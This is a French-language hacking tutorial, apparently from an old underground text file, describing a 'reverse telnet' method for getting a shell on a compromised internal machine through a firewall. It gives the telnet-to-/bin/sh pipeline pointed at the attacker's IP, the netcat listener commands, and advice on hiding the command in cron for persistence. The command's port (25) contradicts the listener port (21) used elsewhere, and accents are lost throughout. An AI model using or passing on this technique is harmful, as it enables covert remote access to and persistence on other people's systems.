

-----------------> Le reverse telnet.

En gnral si vous tes maitre sur une machine  l'intrieur, votre but va
tre de donner accs  cette machine depuis l'extrieur, c'est  dire depuis
Internet.
La technique, en gnral utilise, (elle n'est pas de moi), va tre d'tablir
une connection telnet sur votre machine depuis la machine  l'intrieur.

Mettons que le firewall ne laisse passer que les connections ports 80 (http)
&& 21 (ftp) autorises en sortie.

La machine dont vous avez pris le contrle doit alors xcuter la commande
suivante:
/bin/telnet votre_IP 80 | /bin/sh | /bin/telnet votre_IP 25

Votre machine doit avoir auparavant xcut les commandes:
nc -l -n -v -p 80     (j utilise ici netcat)
nc -l -n -v -p 21
(killer les process ftpd ou httpd s'ils sont lancs)

Explication:
La machine interne se connecte  votre port 80 ouvert grce  netcat.
Les commandes alors tapes dans la fenetres de netcat correspondantes vont
tre piper vers /bin/sh (c'est le reverse telnet) et le resultat du shell
vers votre port 21 ecout par nc dans la deuxieme fenetre.

CL: Vous disposez d'un shell sur lka machine interne outre le firewall!


                          
                  <>--------port 80---- reverse telnet------Machine                  
 Votre Machine            Firewall                       Interne   
                                                         /bin/sh   
   <---------port 21---------------------------                 
                                            


----------------------Remarque--------------------------
Vous pouvez cacher cette commande dans l'un des cron, mais vous devez
alors disposer d'une adresse IP fixe. Pour cela, le mieux est encore de
disposez d'un autre shell ou d'utiliser des techniques de barbare comme un
prog qui irait chercher votre IP cacher dans une page web...
--------------------------------------------------------
